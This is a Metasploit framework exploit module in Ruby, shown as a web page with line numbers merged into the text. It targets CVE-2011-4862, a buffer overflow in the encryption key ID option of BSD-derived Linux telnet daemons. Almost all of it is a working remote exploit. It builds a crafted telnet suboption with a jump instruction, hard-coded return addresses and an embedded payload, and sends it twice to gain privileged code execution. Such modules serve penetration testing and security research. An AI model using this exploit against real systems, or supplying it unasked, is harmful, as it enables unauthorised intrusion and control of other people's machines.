Path: blob/master/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
19718 views
# -*- coding: binary -*-12##3# This module requires Metasploit: https://metasploit.com/download4# Current source: https://github.com/rapid7/metasploit-framework5##67class MetasploitModule < Msf::Exploit::Remote8Rank = GreatRanking910include Msf::Exploit::Remote::Telnet11include Msf::Exploit::BruteTargets1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',18'Description' => %q{19This module exploits a buffer overflow in the encryption option handler of the20Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions21use NetKit-derived telnet daemons, so this flaw only applies to a small subset of22Linux systems running telnetd.23},24'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],25'License' => MSF_LICENSE,26'References' => [27['CVE', '2011-4862'],28['OSVDB', '78020'],29['BID', '51182'],30['EDB', '18280']31],32'Privileged' => true,33'Platform' => 'linux',34'Payload' => {35'Space' => 200,36'BadChars' => "\x00",37'DisableNops' => true,38},3940'Targets' => [41[ 'Automatic', {} ],42[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],43],44'DefaultTarget' => 0,45'DisclosureDate' => '2011-12-23',46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)53end5455def exploit_target(t)56connect57banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)58vprint_status(banner_sanitized)5960enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"61enc_keyid = "\xff\xfa\x26\x07"62end_suboption = "\xff\xf0"6364penc = payload.encoded.gsub("\xff", "\xff\xff")6566key_id = Rex::Text.rand_text_alphanumeric(400)6768key_id[0, 2] = "\xeb\x76"69key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")70key_id[76, 4] = [ t['Ret'] ].pack("V")7172# Some of these bytes can get mangled, jump over them73key_id[80, 40] = "\x41" * 407475# Insert the real payload76key_id[120, penc.length] = penc7778# Create the Key ID command79sploit = enc_keyid + key_id + end_suboption8081# Initiate encryption82sock.put(enc_init)8384# Wait for a successful response85loop do86data = sock.get_once(-1, 5) rescue nil87if not data88fail_with(Failure::Unknown, "This system does not support encryption")89end90break if data.index("\xff\xfa\x26\x02\x01")91end9293# The first request smashes the pointer94print_status("Sending first payload")95sock.put(sploit)9697# Make sure the server replied to the first request98data = sock.get_once(-1, 5)99unless data100print_status("Server did not respond to first payload")101return102end103104# Some delay between each request seems necessary in some cases105::IO.select(nil, nil, nil, 0.5)106107# The second request results in the pointer being called108print_status("Sending second payload...")109sock.put(sploit)110handler111112::IO.select(nil, nil, nil, 0.5)113disconnect114end115end116117118